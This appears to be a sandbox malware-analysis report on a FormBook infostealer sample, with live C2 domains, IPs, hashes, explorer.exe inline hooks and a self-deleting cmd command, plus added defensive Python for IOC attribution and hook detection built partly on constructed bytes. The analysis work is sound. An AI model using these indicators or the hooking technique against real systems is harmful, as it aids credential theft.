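Run against a real file with `suspicious_sections(open(path, "rb").read())`. Entropy is only a hint: a resource section full of PNG icons scores high without being packed, and a packer can pad its payload to drag the figure down, so the flags are for prioritisation, not verdicts.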
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d190 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States
DLL | Imports
KERNEL32.dll | SetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
USER32.dll | GetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
TCP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 13:17:16.933298111 CET | 49696 | 80 | 192.168.2.4 | 34.117.168.233
Nov 29, 2022 13:17:16.956123114 CET | 80 | 49696 | 34.117.168.233 | 192.168.2.4
Nov 29, 2022 13:17:16.956255913 CET | 49696 | 80 | 192.168.2.4 | 34.117.168.233
Nov 29, 2022 13:17:16.956408024 CET | 49696 | 80 | 192.168.2.4 | 34.117.168.233
Nov 29, 2022 13:17:16.978993893 CET | 80 | 49696 | 34.117.168.233 | 192.168.2.4
Nov 29, 2022 13:17:17.045778036 CET | 80 | 49696 | 34.117.168.233 | 192.168.2.4
Nov 29, 2022 13:17:17.045831919 CET | 80 | 49696 | 34.117.168.233 | 192.168.2.4
Nov 29, 2022 13:17:17.045938969 CET | 49696 | 80 | 192.168.2.4 | 34.117.168.233
Nov 29, 2022 13:17:17.046009064 CET | 49696 | 80 | 192.168.2.4 | 34.117.168.233
Nov 29, 2022 13:17:17.068516970 CET | 80 | 49696 | 34.117.168.233 | 192.168.2.4
Nov 29, 2022 13:17:37.271229029 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.290606976 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:37.290796041 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.291032076 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.310297966 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:37.432542086 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:37.432614088 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:37.432749987 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.432842016 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.447979927 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:37.448339939 CET | 49697 | 80 | 192.168.2.4 | 75.2.81.221
Nov 29, 2022 13:17:37.452009916 CET | 80 | 49697 | 75.2.81.221 | 192.168.2.4
Nov 29, 2022 13:17:57.920108080 CET | 49698 | 80 | 192.168.2.4 | 45.221.114.43
Nov 29, 2022 13:17:58.118402004 CET | 80 | 49698 | 45.221.114.43 | 192.168.2.4
Nov 29, 2022 13:17:58.127572060 CET | 49698 | 80 | 192.168.2.4 | 45.221.114.43
Nov 29, 2022 13:17:58.127811909 CET | 49698 | 80 | 192.168.2.4 | 45.221.114.43
Nov 29, 2022 13:17:58.326272964 CET | 80 | 49698 | 45.221.114.43 | 192.168.2.4
Nov 29, 2022 13:17:58.326320887 CET | 80 | 49698 | 45.221.114.43 | 192.168.2.4
Nov 29, 2022 13:17:58.332259893 CET | 49698 | 80 | 192.168.2.4 | 45.221.114.43
Nov 29, 2022 13:17:58.332482100 CET | 49698 | 80 | 192.168.2.4 | 45.221.114.43
Nov 29, 2022 13:17:58.530942917 CET | 80 | 49698 | 45.221.114.43 | 192.168.2.4
UDP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 13:17:16.879111052 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
Nov 29, 2022 13:17:16.917241096 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4
Nov 29, 2022 13:17:37.245763063 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
Nov 29, 2022 13:17:37.270123005 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4
Nov 29, 2022 13:17:57.618912935 CET | 64167 | 53 | 192.168.2.4 | 8.8.8.8
Nov 29, 2022 13:17:57.917346954 CET | 53 | 64167 | 8.8.8.8 | 192.168.2.4
DNS queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 13:17:16.879111052 CET | 192.168.2.4 | 8.8.8.8 | 0xf9d3 | Standard query (0) | www.cdlcapitolsolutions.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 13:17:37.245763063 CET | 192.168.2.4 | 8.8.8.8 | 0x5ae3 | Standard query (0) | www.easyentry.vip | A (IP address) | IN (0x0001) | false
Nov 29, 2022 13:17:57.618912935 CET | 192.168.2.4 | 8.8.8.8 | 0x9a51 | Standard query (0) | www.fulili.com | A (IP address) | IN (0x0001) | false
DNS answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 13:17:16.917241096 CET | 8.8.8.8 | 192.168.2.4 | 0xf9d3 | No error (0) | www.cdlcapitolsolutions.com | gcdn0.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 13:17:16.917241096 CET | 8.8.8.8 | 192.168.2.4 | 0xf9d3 | No error (0) | gcdn0.wixdns.net | td-ccm-168-233.wixdns.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 13:17:16.917241096 CET | 8.8.8.8 | 192.168.2.4 | 0xf9d3 | No error (0) | td-ccm-168-233.wixdns.net | - | 34.117.168.233 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 13:17:37.270123005 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | www.easyentry.vip | 825610.parkingcrew.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 13:17:37.270123005 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | 825610.parkingcrew.net | - | 75.2.81.221 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 13:17:57.917346954 CET | 8.8.8.8 | 192.168.2.4 | 0x9a51 | No error (0) | www.fulili.com | - | 45.221.114.43 | A (IP address) | IN (0x0001) | false
                        • www.cdlcapitolsolutions.com
                        • www.easyentry.vip
                        • www.fulili.com
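The three hostnames above are queried about twenty seconds apart and each is followed by a short HTTP exchange on port 80 with the address the DNS chain ends at. Two of the chains are worth noting before anything is blocked: www.cdlcapitolsolutions.com ends at a Wix CDN host (shared infrastructure), and www.easyentry.vip ends at a parkingcrew.net host, which is a domain-parking service, so that name currently serves no C2 at all. FormBook is known to walk a list of mostly decoy domains with the live C2 hidden among them, so the value of each IOC depends on where its chain terminates. The following Python is an added example, not part of the Joe Sandbox report: it follows the CNAME records of each transaction to the terminal A record, attributes every outbound TCP destination to the hostname that produced it, and tags chains that end at a parking provider. The DNS and TCP records are copied from the tables above; the parking-provider suffix list is a demo assumption.

```python
"""Added example: rebuild CNAME chains from DNS answer records and attribute TCP
destinations to the hostname that produced them. The records are copied from
the report's DNS and TCP tables; the parking-suffix list is a demo assumption."""

# (transaction id, name, cname or None, address or None, record type), from the DNS answers table.
DNS_ANSWERS = [
    ("0xf9d3", "www.cdlcapitolsolutions.com", "gcdn0.wixdns.net", None, "CNAME"),
    ("0xf9d3", "gcdn0.wixdns.net", "td-ccm-168-233.wixdns.net", None, "CNAME"),
    ("0xf9d3", "td-ccm-168-233.wixdns.net", None, "34.117.168.233", "A"),
    ("0x5ae3", "www.easyentry.vip", "825610.parkingcrew.net", None, "CNAME"),
    ("0x5ae3", "825610.parkingcrew.net", None, "75.2.81.221", "A"),
    ("0x9a51", "www.fulili.com", None, "45.221.114.43", "A"),
]
# Queried name per transaction, from the DNS queries table.
DNS_QUERIES = {
    "0xf9d3": "www.cdlcapitolsolutions.com",
    "0x5ae3": "www.easyentry.vip",
    "0x9a51": "www.fulili.com",
}
# First client packet of each TCP flow (src ip, src port, dst ip, dst port), from the TCP table.
TCP_CONNECTIONS = [
    ("192.168.2.4", 49696, "34.117.168.233", 80),
    ("192.168.2.4", 49697, "75.2.81.221", 80),
    ("192.168.2.4", 49698, "45.221.114.43", 80),
]
# Assumed for the demo: hostname suffixes operated by domain-parking services.
PARKING_SUFFIXES = ("parkingcrew.net",)


def resolve_chain(txid: str, name: str, max_hops: int = 10) -> tuple:
    """Follow CNAMEs inside one transaction; return (names in the chain, terminal A addresses)."""
    chain, addresses = [name], []
    for _ in range(max_hops):                       # bounded so a CNAME loop cannot spin forever
        hop = [r for r in DNS_ANSWERS if r[0] == txid and r[1] == chain[-1]]
        addresses = [r[3] for r in hop if r[4] == "A"]
        cnames = [r[2] for r in hop if r[4] == "CNAME"]
        if addresses or not cnames:                 # terminal A record, or a dangling chain
            break
        chain.append(cnames[0])
    return chain, addresses


def is_parked(chain: list) -> bool:
    """True when any hop of the chain belongs to a parking provider."""
    return any(host.endswith(suffix) for host in chain for suffix in PARKING_SUFFIXES)


def attribute_connections() -> list:
    """One record per outbound TCP destination: owning hostname, CNAME chain, parked flag."""
    ip_owner = {}
    for txid, qname in DNS_QUERIES.items():
        chain, addresses = resolve_chain(txid, qname)
        for ip in addresses:
            ip_owner[ip] = (qname, chain)
    rows = []
    for _src, _sport, dst, dport in TCP_CONNECTIONS:
        qname, chain = ip_owner.get(dst, (None, []))
        rows.append({"dst": dst, "dport": dport, "host": qname, "chain": chain, "parked": is_parked(chain)})
    return rows


def live_c2_candidates() -> list:
    """Queried hostnames whose chain did not end at a parking provider."""
    return [r["host"] for r in attribute_connections() if r["host"] and not r["parked"]]


def unattributed_destinations() -> list:
    """Destinations with no preceding DNS answer, i.e. hard-coded addresses worth separate attention."""
    return [r["dst"] for r in attribute_connections() if r["host"] is None]


if __name__ == "__main__":
    for row in attribute_connections():
        print(row["dst"], "<-", " -> ".join(row["chain"]) or "(no DNS)", "[parked]" if row["parked"] else "")
```

Against a real capture the same logic is fed from the DNS and conn logs of whatever sensor is in use; the point is to keep the hostname, the terminal IP and the intermediate CNAME hosts together, because blocking a shared CDN or parking IP on its own causes collateral damage while the queried name is the durable indicator.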

                        Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
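The four hooked exports are the user32 message-retrieval functions every GUI thread calls, and an INLINE hook means the first bytes of the function body in explorer.exe (a 64-bit process here) were overwritten so that the injected code runs before the real function does; that is how keystrokes and clipboard traffic get intercepted without touching any import table. The detection the report performs is a prologue comparison: read the first bytes of each export from the live process and from a clean copy, and classify any difference by the shape of the trampoline it forms. The Python below is an added example, not the sandbox's own code, and implements that comparison and classification over byte strings. The "clean" prologues and most of the "observed" ones are constructed for the demo (they are not real user32.dll bytes); only the six PeekMessageA bytes are taken from the hook table above, and the block shows that they do not match any standard trampoline shape, which is exactly the case where an analyst has to disassemble further rather than trust a pattern.

```python
"""Added example: classify an inline hook by diffing a function's in-memory prologue
against a clean copy. Reading the bytes out of a process (ReadProcessMemory, a minidump)
is the caller's job; this block works on byte strings constructed below."""
import struct

# Constructed clean x64 prologue (mov [rsp+8],rbx; mov [rsp+10h],rsi; push rdi; sub rsp,20h).
CLEAN_X64 = bytes.fromhex("48895C2408 4889742410 57 4883EC20".replace(" ", ""))


def classify_prologue(func_addr: int, clean: bytes, observed: bytes) -> dict:
    """Compare the bytes that overlap; decode the jump target where the trampoline shape allows it."""
    n = min(len(clean), len(observed))
    if observed[:n] == clean[:n]:
        return {"hooked": False, "kind": "clean", "target": None}
    # jmp rel32 (x86 and x64): displacement is relative to the end of the 5-byte instruction.
    if observed[:1] == b"\xE9" and len(observed) >= 5:
        rel = struct.unpack_from("<i", observed, 1)[0]
        return {"hooked": True, "kind": "jmp rel32", "target": (func_addr + 5 + rel) & 0xFFFFFFFFFFFFFFFF}
    # mov rax, imm64 ; jmp rax (x64 absolute, 12 bytes).
    if observed[:2] == b"\x48\xB8" and observed[10:12] == b"\xFF\xE0":
        return {"hooked": True, "kind": "mov rax/jmp rax", "target": struct.unpack_from("<Q", observed, 2)[0]}
    # push imm32 ; ret (x86 absolute, 6 bytes).
    if observed[:1] == b"\x68" and observed[5:6] == b"\xC3":
        return {"hooked": True, "kind": "push/ret", "target": struct.unpack_from("<I", observed, 1)[0]}
    # jmp [rip+disp32]: the target lives in a pointer slot, so report the slot, not a target.
    if observed[:2] == b"\xFF\x25" and len(observed) >= 6:
        disp = struct.unpack_from("<i", observed, 2)[0]
        return {"hooked": True, "kind": "jmp indirect", "target": None, "pointer_slot": func_addr + 6 + disp}
    return {"hooked": True, "kind": "unrecognized modification", "target": None}


def scan_hooks(functions: dict) -> dict:
    """functions: name -> (load address, clean prologue, prologue read from the target process)."""
    return {name: classify_prologue(addr, clean, seen) for name, (addr, clean, seen) in functions.items()}


def hooked_names(report: dict) -> list:
    return sorted(name for name, result in report.items() if result["hooked"])


# Demo input. Addresses are constructed; the PeekMessageA bytes are the six from the report's table.
DEMO_FUNCTIONS = {
    "GetMessageW": (0x7FFB12340000, CLEAN_X64, b"\xE9" + struct.pack("<i", 0x4FFB) + CLEAN_X64[5:]),
    "GetMessageA": (0x7FFB12341000, CLEAN_X64, CLEAN_X64),                       # untouched control
    "PeekMessageW": (0x7FFB12342000, CLEAN_X64, b"\x48\xB8" + struct.pack("<Q", 0x13370000) + b"\xFF\xE0"),
    "PeekMessageA": (0x7FFB12343000, CLEAN_X64, bytes.fromhex("488BB88BBEE5")),  # from the hook table
}


if __name__ == "__main__":
    for name, result in scan_hooks(DEMO_FUNCTIONS).items():
        target = result.get("target")
        print(name, result["kind"], hex(target) if target is not None else "")
```

Two caveats when running this for real: the clean copy must be the on-disk image after relocations are applied at the process's load address, otherwise every function that starts with an absolute address looks hooked; and the check only covers modifications at the very start of the function, so a hook placed a few instructions in, or an IAT hook (the other hook type Joe Sandbox reports), needs a separate comparison.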


                        Target ID:0
                        Start time:13:15:56
                        Start date:29/11/2022
                        Path:C:\Users\user\Desktop\2022-571-GLS.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\2022-571-GLS.exe
                        Imagebase:0x400000
                        File size:274453 bytes
                        MD5 hash:6CC14805BBF5E6BFB4DAAE5C8A61AF7E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:1
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        Target ID:2
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Target ID:3
                        Start time:13:16:01
                        Start date:29/11/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff618f60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:4
                        Start time:13:16:33
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x7ff7c72c0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Target ID:5
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
                        Imagebase:0xd90000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:6
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        No disassembly